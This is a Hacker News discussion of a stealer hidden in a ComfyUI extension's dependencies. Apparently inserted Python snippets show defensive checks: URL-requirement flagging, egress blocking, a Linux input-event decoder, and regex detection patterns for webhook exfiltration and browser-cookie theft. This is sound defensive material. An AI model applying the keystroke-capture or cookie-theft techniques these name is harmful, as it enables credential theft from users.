[HN Gopher] Keylogger discovered in image generator extension
___________________________________________________________________
Keylogger discovered in image generator extension
Author : belladoreai
Score : 234 points
Date : 2024-06-09 17:29 UTC (5 hours ago)
(HTM) web link (old.reddit.com)
(TXT) w3m dump (old.reddit.com)
| LtWorf wrote:
| No domain and website registered?
| skilled wrote:
| Looks like a pretty small project. Only had 40 stars on GitHub
| before the repo was removed.
|
| Was this the main method of GPT4 and Claude integrations for
| ComfyUI?
| belladoreai wrote:
| It was an extension for ComfyUI, which has 37k stars on GitHub.
| The way ComfyUI is commonly used is that a person shares a
| "workflow" file, which utilizes various obscure extensions
| (called "custom nodes") and then the people who want to run the
| workflow on their own computer will install all these obscure
| custom nodes that have like 40 stars on GitHub or so.
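The sharing mechanism described above can be made less blind: before running a shared workflow, you can list which node types it references and check any unfamiliar ones. A minimal sketch, assuming the workflow JSON carries a top-level "nodes" list whose entries have a "type" field (the example workflow string is synthetic):

```python
import json

def list_node_types(workflow_json: str) -> set:
    """Collect every node type a workflow references, so you can review
    which custom nodes it would have you install before running it."""
    data = json.loads(workflow_json)
    return {node.get("type", "?") for node in data.get("nodes", [])}

# Synthetic workflow fragment; real workflows carry much more metadata
example = '{"nodes": [{"type": "KSampler"}, {"type": "ObscureCustomNode"}]}'
print(sorted(list_node_types(example)))  # ['KSampler', 'ObscureCustomNode']
```

Any type that isn't a built-in or part of a well-known node pack is a candidate for the kind of obscure 40-star extension being discussed.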
| szundi wrote:
| Just like an npm install
| LtWorf wrote:
| Using stars as popularity doesn't work.
|
| I have personally never starred anything that I use. And 90% of
| the open source that I use isn't on github.
| WarOnPrivacy wrote:
| Some entity called Nullbulge Group claims they took over the
| repo.
|
| Today's capture (before the repo got 404'd) has their
| belligerence spiel.
| https://web.archive.org/web/20240609135118/https://github.co...
|
| This is the capture from 3 days prior:
| https://web.archive.org/web/20240525021402/https://github.co...
| belladoreai wrote:
| I have not seen a statement from Nullbulge so it's not
| appropriate to say that they took over the repo.
|
| The author of the repo is claiming that their repo is hacked,
| but this is an obvious lie, because their very first GitHub
| commit is the one where they push the malware. Nobody would
| hack an empty GitHub account.
|
| I don't know if the author of the repo is lying when they say
| that Nullbulge is behind the attack (perhaps the author is part
| of Nullbulge, perhaps not).
| millzlane wrote:
| I wouldn't be so sure no one would hack an idle account. I
| had my Spotify account taken before I even used it. I think
| in my case they used my account to pump up other lesser known
| artists.
| belladoreai wrote:
| Okay, sure. But if we have an account which has never had
| any legitimate activity on it ever - an account that has
| only ever been used to push malware - then I don't know if
| it matters much who is the "rightful owner" of the account.
| Things would be different if the GitHub account had some
| legitimate activity before the "hack".
| millzlane wrote:
| I agree it doesn't matter much. Could be a noob mistake
| by the account owner and this is damage control.
| janoc wrote:
| There was also an actively exploited XSS vulnerability on
| GitHub in recent days.
|
| Doesn't mean that this guy was not a malicious actor, only
| that one shouldn't be so quick to cast stones without
| evidence.
| belladoreai wrote:
| The person who created the custom node is the same person
| who "hacked" it. Whether or not the account is
| technically owned by some unrelated civilian is not
| important, because there is no other activity on the
| account.
| zamalek wrote:
| Must be script kiddies. You have the opportunity to deploy
| anything to a machine that almost certainly has a powerful GPU,
| and choose a key logger that exists in signature databases?
| _Genius._
| Stagnant wrote:
| Telegram and discord webhooks are 100% signs of an
| unsophisticated attacker and they are a very common sight in
| malware samples. Github is full of skiddie "info stealer"
| projects that use telegram api / discord webhook to deliver
| the stolen data. They make no sense to use since anybody can
| spam that webhook endpoint. Not 100% sure about discord, but
| at least in the case of telegram anybody can even read and
| download all the data that has been sent to it.
| uyzstvqs wrote:
| Quick search reveals anti-AI motivated script kiddies. Also
| some degen NSFW "art" content on DeviantArt and Reddit by the
| same name, their likely origin.
| 8fingerlouie wrote:
| Something is fishy here.
|
| According to the original report, the "key logger" was in the
| custom wheels in the requirements.txt, but looking at that
| repository there have been only two commits, both of which,
| according to Reddit, had malicious code in them.
|
| Of course, proper discovery would be easier if the GitHub
| account still existed.
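The "custom wheels in requirements.txt" vector mentioned above is mechanically easy to spot: a requirement that points at an arbitrary URL (or a git remote) bypasses PyPI's named releases entirely. A rough sketch of a pre-install check; the file contents below are a hypothetical example, not the actual malicious requirements:

```python
import re

def find_url_requirements(requirements_text: str) -> list:
    """Flag requirement lines that fetch code from an arbitrary URL
    instead of a named PyPI release."""
    flagged = []
    for line in requirements_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Direct URLs ("pkg @ https://...") and git remotes skip PyPI entirely.
        if re.search(r"https?://", line) or line.startswith("git+"):
            flagged.append(line)
    return flagged

reqs = """\
torch
pillow>=10.0
# hypothetical example of a custom wheel dependency
evil-helper @ https://example.com/wheels/evil_helper-1.0-py3-none-any.whl
"""
print(find_url_requirements(reqs))
```

A URL requirement isn't proof of malice (private indexes use them legitimately), but it deserves a look before `pip install -r`.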
| nsingh2 wrote:
| Not surprised at all, ComfyUI extensions are just arbitrary
| python code. The first time I tried ComfyUI extensions I put it
| in a podman container with GPU passthrough and blocked network
| access.
| smarm52 wrote:
| Hopefully this will be just the incentive they need to do
| something safer. Something similar happened before the move
| from pickle to safetensors for model files.
| Maxious wrote:
| Comfy UI manager recently added some security levels so that by
| default you can't accidentally leave a public instance that
| allows remotely installing arbitrary python code
| https://github.com/ltdrdata/ComfyUI-Manager?tab=readme-ov-fi...
| 14 wrote:
| Is there no way to defend against a keylogger? What can you do if
| a simple keylogger can steal your passwords?
| millzlane wrote:
| Use 2FA I'd imagine.
| Latty wrote:
| Ideally, don't use passwords: Passkeys where supported, SSH
| Keys, client certificates, social login via a service that does
| support one of these methods.
|
| Magic link emails can also work, but are potentially vulnerable
| if you copy/pasted it rather than clicking depending on the
| keylogger's capability and clipboard visibility, although the
| window for attack is small, it's a much more sophisticated
| attack that leaves more traces (good sites will reject reuse).
|
| Second best, also use a second factor: U2F ideally, TOTP with
| the same caveats as magic link emails, and at the bottom of the
| barrel SMS which is better than nothing but known to be very
| flawed.
|
| Honestly, if you are anything other than a casual user, and
| don't have devices with support baked in already, it's crazy
| not to spend ~£60 on a pair of security keys for passkey/U2F.
| It's not a lot of money and is just _so_ much more secure.
| danieldk wrote:
| _Ideally, don't use passwords: Passkeys where supported, SSH
| Keys, client certificates, social login via a service that
| does support one of these methods._
|
| If a process has the privileges to run as a keylogger, it can
| also grab your local SSH private keys and possibly harvest
| passwords and passkeys from your local password manager vault
| [1]. The process has local access and since it is a key
| logger presumably your master password. (The complexity
| depends a bit on the password manager, e.g. IIRC macOS
| keychain always requires a roundtrip through the secure
| enclave).
|
| _Honestly, if you are anything other than a casual user, and
| don't have devices with support baked in already, it's crazy
| not to spend ~£60 on a pair of security keys for
| passkey/U2F. It's not a lot of money and is just so much more
| secure._
|
| 100% this. A secure enclave or a hardware key is the only way
| to keep your key material safe.
|
| Also, app sandboxing should be the default. macOS App Store
| Apps are sandboxed. Unfortunately, these days the standard is
| still for applications to have unfettered access to a user's
| files.
|
| [1] Passkeys can also be on a security key, but e.g. Yubikeys
| only have a small number of resident key slots and I think
| _passkeys_ to most people means key material synced through
| iCloud /1Password/your favorite cloud.
| Retr0id wrote:
| Aside from not using passwords or using 2FA, sandboxing helps.
|
| A VM with GPU passthrough set up would be one example (although
| this is usually a pain to set up and I expect most people
| aren't doing it).
|
| As a more user-friendly example, if you install an iOS app
| (local-model LLM and image generation apps exist), the
| sandboxing provided by the OS ought to be more than enough to
| prevent keyloggers, short of 0day exploits.
| nsingh2 wrote:
| Not as secure as VMs but GPU passthrough with Docker/Podman
| is much easier to set up, and you can even use the GPU on the
| host machine at the same time.
| creata wrote:
| Are you giving it access to /dev/dri, or doing some fancier
| sandboxing?
|
| (Would you even need anything fancier? I think /dev/dri is
| supposed to isolate users.)
| nsingh2 wrote:
| Nvidia provides a toolkit to do this [1], getting a GPU
| into a container is as easy as running `podman run
| --device nvidia.com/gpu=all`. The process is similar for
| Docker, but rootless Docker requires some extra steps
| IIRC.
|
| [1] https://docs.nvidia.com/datacenter/cloud-
| native/container-to...
| ehsankia wrote:
| "keylogger" may not be the right term here? I'm not familiar
| with how the term is broadly used, but my definition is a tool
| that logs your keypresses. Here, it seems like it was scraping
| your Chrome/Firefox data for login cookies?
|
| Honestly there's quite a lot of malware that goes after those
| files. I wonder if there's a way to require high privilege for
| accessing Chrome/Firefox appdata, or to just block other apps
| from it entirely.
| stuffoverflow wrote:
| Yeah you're right, people misuse the term keylogger
| frequently. These kinds of malware are broadly called
| "stealers" and usually do not involve keylogging.
|
| Actual keyloggers tend to be rare nowadays due to them being
| easier to detect and the fact that in general the browser
| data is a more valuable target.
| sureglymop wrote:
| I mean, anything with root access can very easily use libevdev
| to get all keystrokes as well as mouse positions. (It's maybe
| 10 lines of code to do that).
|
| So, don't run stuff as root. If it needs root access, run it in
| a virtual machine (personally I use qubes os for this).
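The "10 lines of code" claim above is plausible because each record in /dev/input/event* is a fixed-size `input_event` struct; a root process just reads and unpacks them in a loop. A sketch of the decoding step only, assuming the 64-bit Linux struct layout (a real logger would read raw bytes from the device file, which requires the relevant privileges):

```python
import struct

# struct input_event on 64-bit Linux: two longs (struct timeval),
# unsigned short type, unsigned short code, signed int value.
EVENT_FMT = "llHHi"

def decode_event(raw: bytes) -> dict:
    sec, usec, etype, code, value = struct.unpack(EVENT_FMT, raw)
    return {"type": etype, "code": code, "value": value}

# Synthetic record: EV_KEY (type 1), KEY_A (code 30), key press (value 1)
raw = struct.pack(EVENT_FMT, 0, 0, 1, 30, 1)
print(decode_event(raw))  # {'type': 1, 'code': 30, 'value': 1}
```

This is exactly why "don't run untrusted code as root" is the operative advice: nothing more exotic than read access to the input devices is needed.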
| 42lux wrote:
| That discussion on reddit really is something else: so much
| misinformation and pretend knowledge at work. It's as scary as
| the malware.
| SoftTalker wrote:
| And this is the input for AI training.....
| nicce wrote:
| Not just any input, but paid input :-)
| Ukv wrote:
| The user's reddit profile: https://archive.is/G5GIW
|
| They have a couple of other tools hosted on HuggingFace, both
| having the malicious dependencies and both requiring entering API
| keys, namely:
|
| "SillyTavern Character Generator": https://archive.is/gETq3
| (requirements.txt: https://archive.is/xqqtA)
|
| "Image Description with Claude Models and GPT-4 Vision":
| https://archive.is/6Ydgs (requirements.txt:
| https://archive.is/9Sp5C)
|
| They've also posted some BeamNG mods, and were casting doubt on
| accusations that some other account's mod contained malware:
| https://archive.is/zLiaZ
|
| That other account's reddit profile: https://archive.is/r9V1M
| tamimio wrote:
| Lesson for the people who run and execute stuff without looking
| at the code first.
| vvpan wrote:
| Which is everybody in the world except for a handful of people.
| tamimio wrote:
| Not really, and it takes a few minutes because most of these
| packages (including npm) are small. You don't have to read
| the WireGuard codebase because it's reputable enough, but for
| obscure or unknown add-ons/package code, it's on you to
| double-check, just like reading the 'readme'.
| froggertoaster wrote:
| You can't "not really" this away. Most people don't bother
| looking at small package code, much less code for packages
| that are far more complex.
| redserk wrote:
| So just sneak the code in a dependency of a dependency.
|
| Who's diving 3-4 layers deep into dependencies?
| netule wrote:
| No need to hide it inside dependencies, just modify the
| code before building and pushing the package to PyPI.
| bdlowery wrote:
| I haven't looked at the source code of a single npm package
| I've installed in the past 5 years.
|
| "It takes a few minutes"
|
| Dude my web dev projects have like 1,000s of dependencies.
| I'm not going to check the source code of every package
| tailwind requires.
| fbdab103 wrote:
| Even if you did review it, a motivated attacker is not
| going to have an exfiltrate_user_data(). The xz backdoor
| exploit was incredibly sophisticated, and one key of the
| design was sneaking a "." into a single line of a build
| test script.
|
| A cursory audit of primary dependencies has almost zero
| chance of catching anything but a brazen exploit.
| redserk wrote:
| Yeah. Realistically I think the best course of action is
| just assume you're already using a library that can
| exfiltrate data.
|
| This requires allowlisting egress traffic and possibly
| even architecting things to prevent any one library from
| seeing too many things. This approach can be a big pain
| though and could be difficult to implement practically.
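One way to picture the egress-allowlisting idea is an in-process guard on outbound connections. This monkeypatch sketch is only a speed bump (native code or a subprocess bypasses it trivially; real enforcement belongs in a firewall or network namespace), and the allowlisted address is hypothetical:

```python
import socket

ALLOWED_HOSTS = {"203.0.113.1"}  # hypothetical allowlist of permitted endpoints

_real_connect = socket.socket.connect

def guarded_connect(self, address):
    """Refuse any outbound connection whose destination is not allowlisted."""
    if address[0] not in ALLOWED_HOSTS:
        raise PermissionError("egress blocked: " + str(address[0]))
    return _real_connect(self, address)

socket.socket.connect = guarded_connect

# A dependency trying to phone home now fails before any traffic is sent:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(("203.0.113.9", 443))  # TEST-NET address standing in for an exfil host
except PermissionError as e:
    print(e)  # egress blocked: 203.0.113.9
finally:
    s.close()
```

The same policy expressed at the OS level (iptables/nftables, or `--network=none` on a container) is what actually stops a determined library.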
| akira2501 wrote:
| This is why I refuse to use almost anything on npm. If you
| have a zero dependency project I'll consider it. If you
| have a dependency that also has a set of dependencies then
| I will never use your code.
| gotbeans wrote:
| Imo this makes no sense. There's zero chance you will start
| inspecting all dependencies even in a relatively small
| application, which nowadays can already pull in a large
| number of deps.
|
| I don't see how doing any of this manually will help.
| genter wrote:
| Would you have caught the XZ backdoor?
| creata wrote:
| Most people should only download software from people they
| trust (to not be evil and also to be competent).
|
| If you download code off some unknown person's GitHub repo,
| you'd be stupid not to read it very very carefully!
| Geee wrote:
| Ain't nobody got time for that. LLMs should be capable of
| analysing code for anything malicious / suspicious.
| yonixw wrote:
| Since LLMs and keyloggers are Turing machines, it won't
| happen. (Or more precisely: it won't beat the cat and mouse
| game of obfuscations.)
| kibwen wrote:
| Unfortunately, no, because the existence of LLMs that can
| automatically determine code that is suspicious will be
| offset by the existence of LLMs that can generate malicious
| code that bypasses the detection abilities of the
| aforementioned LLMs.
| CrazyStat wrote:
| Generative Adversarial LLMs, let's go!
| protosam wrote:
| Perhaps we could just call these ALLMs (Adversarial Large
| Language Models). You're already dropping the N in GAN, I
| see no need for the G.
|
| As an end result I think someone clever could make a
| LLaMA pun for the name of a LLaMA based ALLM.
| astromaniak wrote:
| No, they cannot work with large codebases, not yet. And they
| have very limited talent for logic and debugging. They may
| improve at some point, and will probably be hooked up with
| external tools.
| StressedDev wrote:
| Everyone runs code they have not inspected. For example, almost
| no one has read all of the code in FreeBSD, Linux (kernel),
| macOS, OpenBSD, or Windows. I also doubt people are reading
| all of the code in their favorite Linux distribution.
|
| Even inspecting the code is not enough because a lot of
| security vulnerabilities are not obvious. Basically, security
| is hard, and often there are not a lot of good solutions.
|
| Here are some tricks I have found which have helped me minimize
| my risk:
|
| 1) Use different machines for different purposes. Basically,
| you should not use 1 PC (or Mac) for everything. I have one for
| my finances, one for gaming, and a general-purpose PC. If one
| gets hacked, the others are still fine.
|
| 2) Get software from trustworthy sources. Most of the major
| software companies are not going to ship malicious code. For
| open-source software, use software from popular projects which
| have a good reputation.
|
| 3) Ask yourself why someone is providing this software. Is it
| for money? Are they creating it because they enjoy it? How do
| they support themselves? For example, Google's business model
| is building a dossier on people so it can deliver ads they are
| more likely to click on. When Google gives you something for
| "free", they will probably use it to track you, or track
| visitors to your website.
|
| 4) Support the people who build the software you use. If it's
| commercial software, pay for it, do not pirate it. If it's open
| source, donate time or money to the projects you use. Also,
| thank the people who work on the software, and ALWAYS treat
| them with respect.
|
| 5) Avoid pirated software, software from "free" porn web sites,
| etc. People who provide illegal software, or sketchy software
| are probably willing to put back doors in it.
| creata wrote:
| > For open-source software, use software from popular
| projects which have a good reputation.
|
| On this topic, how much should a person trust central
| repositories of well-known operating system distributions
| (e.g. Arch, Debian)? I know only trusted people can upload to
| them, and the only time I've ever heard of malware slipping
| past them was XZ, but I don't know how much care they take.
| uyzstvqs wrote:
| I'm curious if it'd be possible to use a Code LLM to scan GitHub
| repos and detect possible malware hiding in source code.
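Short of an LLM, even crude string heuristics catch the brazen cases discussed in this thread (webhook exfiltration, obfuscated exec). A sketch of such a baseline scanner; the patterns and the sample line are illustrative, not taken from the actual malware:

```python
import re

# Crude indicators of the kind this thread debates; an LLM-based scanner
# would go beyond these, but they flag unsophisticated stealers.
SUSPICIOUS_PATTERNS = {
    "discord webhook": r"discord(app)?\.com/api/webhooks",
    "telegram bot api": r"api\.telegram\.org/bot",
    "obfuscated exec": r"exec\s*\(\s*base64",
    "browser cookie store": r"(Chrome|Firefox).{0,40}(Cookies|cookies\.sqlite)",
}

def scan_source(source: str) -> list:
    """Return the names of every suspicious pattern found in the source."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items()
            if re.search(pat, source)]

sample = 'requests.post("https://discord.com/api/webhooks/123/abc", json=data)'
print(scan_source(sample))  # ['discord webhook']
```

As the replies below note, any fixed detector invites an arms race: an attacker who can run the scanner locally can tweak until it passes.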
| ChrisMarshallNY wrote:
| I have a feeling that we'll be seeing some businesses built
| around exactly that.
| bdangubic wrote:
| Github? ;)
| tehlike wrote:
| Socket.dev is not built around this but makes use of this.
| pingou wrote:
| I'm afraid a few simple tweaks, especially if the hackers
| themselves have access to the code LLM to try out their code,
| will be sufficient to evade detection.
| nicce wrote:
| Endless race like with Anti-Virus software.
| dmazzoni wrote:
| If such a tool became commonplace, bad actors would just run it
| on their own malware and keep tweaking it until the LLM failed
| to detect it.
| creata wrote:
| Why does there seem to be such a disregard for security in deep
| learning?
|
| There's examples like this post, but also, until recently, almost
| every deep learning model was literally distributed as a pickle
| file.
| wisemang wrote:
| "Security is not my field, I'm a stats guy": a qualitative root
| cause analysis of barriers to adversarial machine learning
| defenses in industry [0]
|
| [0] https://dl.acm.org/doi/abs/10.5555/3620237.3620448
| chx wrote:
| It's not specific to deep learning, practically every industry
| will look at security as a cost that's just not worth it. When
| we start throwing the CEO into jail instead of making them pay
| an 18.5M fine for losing the data of 41 million customers, that's
| when things will change. Until then, it's just the cost of
| doing business.
| dysoco wrote:
| From my outsider perspective, it's a field that moves very
| fast, there seem to be new tools being released every week so:
|
| 1) As the developer if you focus on hardening, you might be too
| late to release.
|
| 2) People downloading shiny new libs/files/programs constantly.
|
| 3) Influx of people not that versed in the basics of computer
| security playing around with local LLM models, image
| generators, etc.
| justinclift wrote:
| That seems like an almost exact duplicate of the NodeJS/NPM
| issues?
|
| Those same points (but the NodeJS/NPM version of them) are a
| lot of why that ecosystem is having security and reputation
| issues as well.
| sys_64738 wrote:
| Isn't this just one of the milestones that'll eventually
| happen? Blind panic due to security always occurs at some
| point. There must be a 'law' defined for this somewhere.
| Seattle3503 wrote:
| How do people feel about using docker to prevent this sort of
| thing? Does it strike the right balance between usability and
| security?
| belladoreai wrote:
| Well, Docker is great for this as long as you're not one of the
| unlucky few whose machine is bricked because of Docker. So,
| mostly yes, I suppose.
| lyu07282 wrote:
| What does that even mean?
| belladoreai wrote:
| "Bricking" is when your electronic device stops working,
| i.e. becomes a brick. Docker is known to occasionally brick
| Windows machines.
| jiggawatts wrote:
| Wait... what!?
|
| This is the first I'm hearing of this. Do you have any
| references?
| justinclift wrote:
| Docker itself doesn't seem to have the best quality control
| for their official releases, so blindly upgrading Docker
| will likely bite you in the ass if you do it for a few
| years. :(
| badrunaway wrote:
| What can be done to stop all this? We need some sort of OS-level
| layer to validate these things. If we put in a local LLM that
| checks the bytecode of things being installed or run, will that
| solve all this? My heart goes out to those who must have lost
| their money due to this.
| creata wrote:
| One basic measure (one part of a solution) would be to split
| Comfy into two parts: the part that does all the work (running
| plugins, generating images) should have access to nothing but
| read-only access to the files it needs, the GPU, and a socket
| to communicate with the other part.
| badrunaway wrote:
| A cleaner API you mean which exposes what is necessary only.
| creata wrote:
| I meant sandbox the less trusted bit.
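The split being described, a trusted frontend talking to a less-trusted worker over a channel, can be sketched with two processes and a pipe. This shows only the message-passing shape; the actual privilege dropping and filesystem/network restrictions (the point of the design) are stubbed out as a comment:

```python
from multiprocessing import Process, Pipe

def worker(conn):
    """Untrusted half: in a real design this process would drop
    privileges / enter a sandbox here, then only ever talk to the
    trusted half over the pipe."""
    while True:
        job = conn.recv()
        if job is None:  # shutdown sentinel
            break
        # Stand-in for running plugins / generating an image
        conn.send({"job": job, "status": "done"})

def run_one_job(job):
    """Trusted half: hand a job to the sandboxed worker, await the result."""
    parent, child = Pipe()
    p = Process(target=worker, args=(child,))
    p.start()
    parent.send(job)
    result = parent.recv()
    parent.send(None)
    p.join()
    return result

if __name__ == "__main__":
    print(run_one_job("render-graph-1"))
```

Because the worker's only channel back is the pipe, a malicious plugin in that process can corrupt results but cannot quietly read the user's home directory or open sockets, provided the sandboxing stub is actually filled in.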
| KennyBlanken wrote:
| Well, for one, the keylogger is detected by antivirus programs.
|
| I keep coming across various projects whose executables trigger
| antivirus programs, and I think that when those triggers
| happen, "it's fine, don't worry" claims need to be treated with
| more skepticism.
|
| At the same time, antivirus vendors need to stop being so lazy
| and using strings and such that are clearly part of an open
| source program/library for their signatures.
| badrunaway wrote:
| I believe there should be a clear indicator in the UI of
| every OS when any new program listens to your keystrokes.
| It should be the norm.
| FileSorter wrote:
| I think this is one of the use cases for a sandboxed WASM
| plugin system.
| creata wrote:
| But almost everyone working on these plugins _really_ wants
| to use Python and PyTorch.
| badrunaway wrote:
| Has nobody ported Python to WASM yet?
| aintnolove wrote:
| I peered down the ComfyUI rabbit hole [1] and it is shockingly
| powerful. Did Adobe drop the ball on image generation? What are
| they doing over there? There has to be a better, more secure way
| to bundle up all this imagegen logic.
|
| [1] https://learn.thinkdiffusion.com/bria-ai-for-background-
| remo...
| belladoreai wrote:
| Yep, it's super powerful.
|
| I would say that the "more secure way" is to just use ComfyUI
| without installing any obscure nodes from unknown developers.
| You can do pretty much anything using just the default nodes
| and the big node packs.
___________________________________________________________________
(page generated 2024-06-09 23:01 UTC)